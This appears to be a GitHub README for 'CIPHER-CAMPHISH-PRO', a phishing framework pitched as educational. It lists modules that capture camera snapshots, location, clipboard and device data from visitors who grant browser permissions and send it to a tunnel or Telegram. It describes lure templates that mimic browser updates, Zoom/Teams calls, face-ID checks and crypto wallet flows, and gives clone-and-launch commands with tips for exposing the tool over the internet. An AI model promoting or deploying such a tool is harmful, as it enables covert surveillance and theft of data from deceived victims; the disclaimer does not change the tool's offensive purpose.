Browser Security & Permissions Auditor
"Exploring the limits of browser privacy." An educational framework to demonstrate how social engineering exploits browser permissions.
CIPHER-CAMPHISH-PRO is a security research tool designed to demonstrate the importance of browser permission management. It simulates a social engineering attack to show how easily sensitive data (like camera access, location, and device info) can be exposed if a user unknowingly grants permissions to a malicious website.
| Feature Name | Internal ID | Functionality | Status |
|---|---|---|---|
| Camera Capture | MOD-CAM |
Captures snapshots upon permission grant. | STABLE |
| Data Exfiltration | MOD-DATA |
Securely tunnels captured data to host. | FAST |
| Geolocation | MOD-GPS |
Extracts precise location coordinates. | STABLE |
| Clipboard Analysis | MOD-CLIP |
Audits clipboard content privacy. | ACTIVE |
| Device Fingerprint | MOD-INFO |
Analyzing Hardware (RAM, CPU, Battery). | STABLE |
| Network Recon | MOD-NET |
IP Discovery & WebRTC Leak Testing. | BETA |
The tool includes pre-built social engineering templates to test user awareness:
- System Diagnostic: Mimics a browser update or repair screen.
- Video Conference: Simulates Zoom/Teams interfaces to request camera access.
- Identity Verification: Phishing template for biometric/face ID verification.
- Crypto-Assets: Testing vulnerabilities in wallet connection flows.
graph TD
A[Target User] -->|Clicks Link| B{Phishing Interface}
B -->|Grants Permission| C[Capture Engine]
C -->|Process Data| D[Local Server / Tunnel]
D -->|Notify| E[Telegram/Terminal]
style C fill:#10b981,stroke:#000,stroke-width:2px,color:#000
Designed for Linux & Termux Environments
# 1. Clone the repository
git clone https://github.com/cipher-attack/camphish-pro.git
# 2. Navigate to directory & Grant permissions
cd camphish-pro && chmod +x *
# 3. Launch the framework
./cipher.sh💡 Pro Tip: Use the Cloudflared option when testing over the internet (WAN) for better stability than Ngrok. Use Localhost for internal testing.
|
|
Security Researcher & Student I am a 12th-grade student and self-taught security enthusiast from Ethiopia. My work focuses on Mobile Offensive Security and raising awareness about digital privacy. I build and manage my projects primarily using Termux on my mobile device. GitHub • Telegram |
This tool is for EDUCATIONAL PURPOSES only.
Usage of CIPHER-CAMPHISH-PRO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.